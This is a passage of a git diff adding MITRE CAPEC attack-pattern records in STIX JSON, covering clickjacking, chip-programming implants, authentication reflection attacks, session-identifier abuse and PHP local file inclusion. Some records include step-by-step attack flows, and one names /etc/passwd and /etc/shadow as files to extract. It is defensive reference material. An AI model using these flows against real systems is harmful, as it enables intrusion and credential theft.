0000000000000000000000000000000000000000..6c84a9ebce4ce42e2e3d5fa22033040c16c1c714 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json 
@@ -0,0 +1,48 @@ +{ + "id": "bundle--5eac6a18-5647-46c6-bd06-94dd637ccbdf", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker creates a transparent overlay using flash in order to intercept user actions for the purpose of performing a clickjacking attack. In this technique, the Flash file provides a transparent overlay over HTML content. Because the Flash application is on top of the content, user actions, such as clicks, are caught by the Flash application rather than the underlying HTML. The action is then interpreted by the overlay to perform the actions the attacker wishes.", + "external_references": [ + { + "external_id": "CAPEC-181", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + } + ], + "id": "attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Flash File Overlay", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The victim must be tricked into navigating to the attackers' decoy site and performing the actions on the decoy page.", + "The victim's browser must support invisible Flash overlays." + ], + "x_capec_resources_required": [ + "The attacker must be able to force the Flash overlay over the decoy content." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb.json new file mode 100644 index 0000000000000000000000000000000000000000..c958ca9068668f932092e7b0ce89a132fe35b808 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb.json 
@@ -0,0 +1,64 @@ +{ + "id": "bundle--1e7f5c64-b068-43e4-a325-a8f62497117c", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n During the programming step of chip manufacture, an adversary with access and necessary technical skills maliciously alters a chip’s intended program logic to produce an effect intended by the adversary when the fully manufactured chip is deployed and in operational use. Intended effects can include the ability of the adversary to remotely control a host system to carry out malicious acts.\n ", + "external_references": [ + { + "external_id": "CAPEC-672", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/672.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Code Implanted During Chip Programming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Following a chip’s production process steps of test and verification and 
validation of chip circuitry, an adversary involved in the generation of microcode defining the chip’s function(s) inserts a malicious instruction that will become part of the chip’s program. When integrated into a system, the chip will produce an effect intended by the adversary.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a foundry’s or chip maker’s development/production environment where programs for specific chips are developed, managed and uploaded into targeted chips prior to distribution or sale." + ], + "x_capec_skills_required": { + "Medium": "An adversary needs to be skilled in microprogramming, manipulation of configuration management systems, and in the operation of tools used for the uploading of programs into chips during manufacture. Uploading can be for individual chips or performed on a large scale basis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json new file mode 100644 index 0000000000000000000000000000000000000000..5058e9b8cbae9508f8cabee47e6eb8c23a97f8c7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json 
@@ -0,0 +1,47 @@ +{ + "id": "bundle--a14c3251-f302-41ba-a5dd-34e3a3599bb3", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary subverts a communications protocol to perform an attack. This type of attack can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.", + "external_references": [ + { + "external_id": "CAPEC-272", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/272.html" + } + ], + "id": "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Protocol Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7", + "attack-pattern--a46718a5-0206-44da-a4f8-b1943f85188b", + "attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab", + "attack-pattern--b6f5248a-346f-484f-8091-8ab84288aa81", + "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a" + ], + "x_capec_prerequisites": [ + "The protocol or implementations thereof must contain bugs that an adversary can exploit." + ], + "x_capec_resources_required": [ + "In some variants of this attack the adversary must be able to intercept communications using the protocol. This means they need to be able to receive the communications from one participant and prevent the other participant from receiving these communications." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json new file mode 100644 index 0000000000000000000000000000000000000000..080a334205783d54e59f3141887528c8ab4f2e8a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--60a5ffd8-9fae-4474-8f43-548f84e55b87", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-432", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/432.html" + } + ], + "id": "attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Voice in NLP", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json new file mode 100644 index 0000000000000000000000000000000000000000..63436b346ddbaf25911b4ae581cb433eb5ec98c2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json 
@@ -0,0 +1,73 @@ +{ + "id": "bundle--b6b67366-ccf0-4998-bc7b-2a97049e6b96", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable. These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis.\n ", + "external_references": [ + { + "external_id": "CAPEC-191", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/191.html" + }, + { + "external_id": "CWE-798", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/798.html" + }, + { + "description": "Unsecured Credentials:Credentials in files", + "external_id": "T1552.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/001" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-51", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Decompiler" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-52", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Debugger" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-53", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Disassembler" + } + ], + "id": "attack-pattern--2231936f-0dda-4736-a089-9e734231907c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Read Sensitive Constants Within an Executable", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + 
"attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d" + ], + "x_capec_domains": [ + "Software", + "Physical Security" + ], + "x_capec_extended_description": "\n One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.\n Additionally, sensitive numeric values can occur within an executable. This can be used to discover the location of cryptographic constants.\n ", + "x_capec_prerequisites": [ + "Access to a binary or executable such that it can be analyzed by various utilities." + ], + "x_capec_resources_required": [ + "Binary analysis programs such as 'strings' or 'grep', or hex editors." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json
new file mode 100644
index 0000000000000000000000000000000000000000..583f9d1fa1cc9f586afd4d35ce4a65c7ea520c9e
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json
@@ -0,0 +1,76 @@ +{ + "id": "bundle--9a0c639f-6745-4664-aa5d-c4de59966a92", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the adversary illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An adversary can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.", + "external_references": [ + { + "external_id": "CAPEC-90", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/90.html" + }, + { + "external_id": "CWE-301", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/301.html" + }, + { + "external_id": "CWE-303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/303.html" + } + ], + "id": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Reflection Attack in Authentication Protocol", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34", + "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "\n 
A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.\n An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify service with vulnerable handshake authentication: The adversary must first identify a vulnerable authentication protocol. The most common indication of an authentication protocol vulnerable to reflection attack is when the client initiates the handshake, rather than the server. This allows the client to get the server to encrypt targeted data using the server's pre-shared key.

Experiment

  1. Send challenge to target server: The adversary opens a connection to the target server and sends it a challenge. This challenge is arbitrary and is simply used as a placeholder for the protocol in order to get the server to respond.

  2. Receive server challenge: The server responds by returning the challenge sent encrypted with the server's pre-shared key, as well as its own challenge to the attacker sent in plaintext. We will call this challenge sent by the server \"C\". C is very important and is stored off by the adversary for the next step.

  3. Initiate second handshake: Since the adversary does not possess the pre-shared key, they cannot encrypt C from the previous step in order for the server to authenticate them. To get around this, the adversary initiates a second connection to the server while still keeping the first connection alive. In the second connection, the adversary sends C as the initial client challenge, which rather than being arbitary like the first connection, is very intentional.

  4. Receive encrypted challenge: The server treats the intial client challenge in connection two as an arbitrary client challenge and responds by encrypting C with the pre-shared key. The server also sends a new challenge. The adversary ignores the server challenge and stores the encrypted version of C. The second connection is either terminated or left to expire by the adversary as it is no longer needed.

Exploit

  1. The adversary now posseses the encrypted version of C that is obtained through connection two. The adversary continues the handshake in connection one by responding to the server with the encrypted version of C, verifying that they have access to the pre-shared key (when they actually do not). Because the server uses the same pre-shared key for all authentication it will decrypt C and authenticate the adversary for the first connection, giving the adversary illegitimate access to the target system.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol." + ], + "x_capec_resources_required": [ + "All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json new file mode 100644 index 0000000000000000000000000000000000000000..1ca5d26b9f5a9a8aa8535fc9365c4d186234bded --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json 
@@ -0,0 +1,73 @@ +{ + "id": "bundle--5d8e103e-4fb3-4d8a-ad5f-7af0aaecd7c7", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.", + "external_references": [ + { + "external_id": "CAPEC-580", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/580.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-205", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/205.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "System Information Discovery", + "external_id": "T1082", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1082" + } + ], + "id": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "modified": "2023-01-24T00:00:00.000Z", + "name": "System Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e" + ], + "x_capec_prerequisites": [ + "The adversary must have logical access to the target network and system." 
+ ], + "x_capec_skills_required": { + "Low": "The adversary needs to know basic linux commands." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json new file mode 100644 index 0000000000000000000000000000000000000000..52e53808d6b168bd6c471739bb93996208a465ad --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json 
@@ -0,0 +1,141 @@ +{ + "id": "bundle--ff6a5ea6-5759-4fad-8636-7c01142513ec", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary guesses, obtains, or \"rides\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.\n ", + "external_references": [ + { + "external_id": "CAPEC-21", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/21.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-6", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-642", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/642.html" + }, + { + "description": "Access Token Manipulation", + "external_id": "T1134", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134" + }, + { + "description": "Steal Application Access Token", + "external_id": "T1528", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1528" + }, + { + "description": 
"Steal Web Session Cookie", + "external_id": "T1539", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1539" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Trusted Identifiers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.\n A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. 
A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.\n The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application.\n ", + "For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for Indicators of Susceptibility: Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.

  2. Techniques
    Spider all available pages
    Attack known bad interfaces
    Search outward-facing configuration and properties files for identifiers.

Experiment

  1. Fetch samples: The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.

  2. Techniques
    An adversary makes many anonymous connections and records the session IDs assigned.
    An adversary makes authorized connections and records the session tokens or credentials issued.
    An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.\n Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. 
An adversary may also \"ride\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.\n Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d" + ], + "x_capec_prerequisites": [ + "Server software must rely on weak identifier proof and/or verification schemes.", + "Identifiers must have long lifetimes and potential for reusability.", + "Server software must allow concurrent sessions to exist." + ], + "x_capec_resources_required": [ + "Ability to deploy software on network.", + "Ability to communicate synchronously or asynchronously with server." + ], + "x_capec_skills_required": { + "Low": "To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--d56469be-4ebc-4443-b85a-3097193df4c4.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--d56469be-4ebc-4443-b85a-3097193df4c4.json new file mode 100644 index 0000000000000000000000000000000000000000..c85a79c2be015dc3be6afabe9e469f34c8052fb1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--d56469be-4ebc-4443-b85a-3097193df4c4.json 
@@ -0,0 +1,54 @@ +{ + "id": "bundle--67a68e63-2754-4502-986d-a1cc3a35453e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker loads and executes an arbitrary local PHP file on a target machine. The attacker could use this to try to load old versions of PHP files that have known vulnerabilities, to load PHP files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.", + "external_references": [ + { + "external_id": "CAPEC-252", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/252.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "OWASP Vulnerabilities, The Open Web Application Security Project (OWASP)", + "external_id": "REF-621", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/vulnerabilities/PHP_File_Inclusion" + } + ], + "id": "attack-pattern--d56469be-4ebc-4443-b85a-3097193df4c4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "PHP Local File Inclusion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find. The adversary is looking for URLs that show PHP file inclusion is used, which can look something like \"http://vulnerable-website/file.php?file=index.php\".

  2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Attempt variations on input parameters: Once the adversary finds a vulnerable URL that takes file input, they attempt a variety of path traversal techniques to attempt to get the application to display the contents of a local file, or execute a different PHP file already stored locally on the server.

  2. Techniques
    Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of path traversal techniques used to include well known files.
    Use a proxy tool to record results of manual input of local file inclusion probes in known URLs.

Exploit

  1. Include desired local file: Once the adversary has determined which techniques of path traversal successfully work with the vulnerable PHP application, they will target a specific local file to include. These can be files such as \"/etc/passwd\", \"/etc/shadow\", or configuration files for the application that might expose sensitive information.

",
+ "x_capec_prerequisites": [
+ "The targeted PHP application must have a bug that allows an attacker to control which code file is loaded at some juncture."
+ ],
+ "x_capec_resources_required": [
+ "The attacker needs to have enough access to the target application to control the identity of a locally included PHP file."
+ ],
